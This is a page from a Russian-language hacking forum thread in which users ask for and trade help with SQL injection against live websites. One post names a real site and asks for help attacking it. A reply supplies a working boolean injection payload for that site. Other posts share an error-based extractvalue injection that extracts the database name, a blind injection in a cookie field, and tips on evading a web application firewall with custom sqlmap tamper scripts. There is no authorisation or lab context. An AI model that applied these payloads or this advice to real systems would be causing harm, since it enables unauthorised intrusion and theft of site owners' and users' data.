HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #901  
Старый 20.06.2019, 21:45
den4ik1090
Новичок
Регистрация: 21.01.2019
Сообщений: 3
Провел на форуме:
1034

Репутация: 0
По умолчанию

Подскажите как в мапе докрутить:

 
Ответить с цитированием

  #902  
Старый 21.06.2019, 22:55
sepo
Новичок
Регистрация: 25.04.2010
Сообщений: 0
Провел на форуме:
2763

Репутация: 0
По умолчанию

Всем привет, кто может, помогите долбануть этот сайт:

Код:
http://wrappers.ru/?act=polls&poll=1%22%27
 
Ответить с цитированием

  #903  
Старый 21.06.2019, 22:56
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
Провел на форуме:
759330

Репутация: 147


По умолчанию

Цитата:
Сообщение от sepo  

помогите долбануть этот сайт
Что значит долбануть?

Привет..
 
Ответить с цитированием

  #904  
Старый 21.06.2019, 23:07
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от sepo  

Всем привет, кто может, помогите долбануть этот сайт:
Код:
http://wrappers.ru/?act=polls&poll=1%22%27
1- вы ошиблись разделом

2- там waf

3- не ясно что вы ходите. Задайте точный вопрос или опишите проблему.

Код:
http://wrappers.ru/?act=polls&poll=1"+and+substring(@@version,1,1)=5+--+-
 
Ответить с цитированием

  #905  
Старый 22.06.2019, 01:22
sepo
Новичок
Регистрация: 25.04.2010
Сообщений: 0
Провел на форуме:
2763

Репутация: 0
По умолчанию

спасибо
 
Ответить с цитированием

  #906  
Старый 24.06.2019, 04:28
hubby666
Новичок
Регистрация: 24.06.2019
Сообщений: 1
Провел на форуме:
376

Репутация: 0
По умолчанию

Всем привет, такой вопрос - есть куча ссылок которые нужно пройти, отдаю их мапу и ухожу, как сделать чтобы уязвимые ссылки как-то помечались, потому что он в аутпут складывает все как я понимаю, без разбора, то есть все пройденные. Спасибо.
 
Ответить с цитированием

  #907  
Старый 08.07.2019, 15:54
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от man474019  

Hi
sqlmap dumps all data in table, but I want to dump specify columns in that table, but sqlmap doesn't retrieve any data
I try --hex --no-cast tamper scripts (unionalltounion, between) but no result
What can you advice for help ?
Thanks !
Проверьте запрос в ручную на что срабатывает WAF,обходите его и пишите свой tamper под него.
 
Ответить с цитированием

  #908  
Старый 08.07.2019, 20:51
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от man474019  

interesting is that, sqlmap dumps username column, but can not dump email and password columns..but when dump all table, sqlmap dumps normally
it happens, use the old version
 
Ответить с цитированием

  #909  
Старый 02.08.2019, 12:57
BenderMR
Познающий
Регистрация: 23.02.2019
Сообщений: 65
Провел на форуме:
22457

Репутация: 10
По умолчанию

День добрый, господа.

Есть такая скуль:

Код:
https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27,%20extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
Где вроде как insert statement, потому что если после ' не добавить еще один параметр через запятую, то выдается такая ошибка:

Код:
Column count doesn't match value count at row 1
Подскажите, реально ли такое засунуть в мап и как это сделать?
 
Ответить с цитированием

  #910  
Старый 05.08.2019, 09:56
LeninDie
Познающий
Регистрация: 26.12.2015
Сообщений: 34
Провел на форуме:
12479

Репутация: 2
По умолчанию

привет. подскажите как мапу указать на то какие данные меняются? скуля слепая

в куках уязвим параметр identifyId: amplitude_idundefined={"optOut":false,"sessionId": null,"lastEventTime":null,"eventId":0,"identifyId" :027179381' or 3726=3726--,"sequenceNumber":0} я так понимаю нужно добавить --string="а вот что здесь хз"

 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.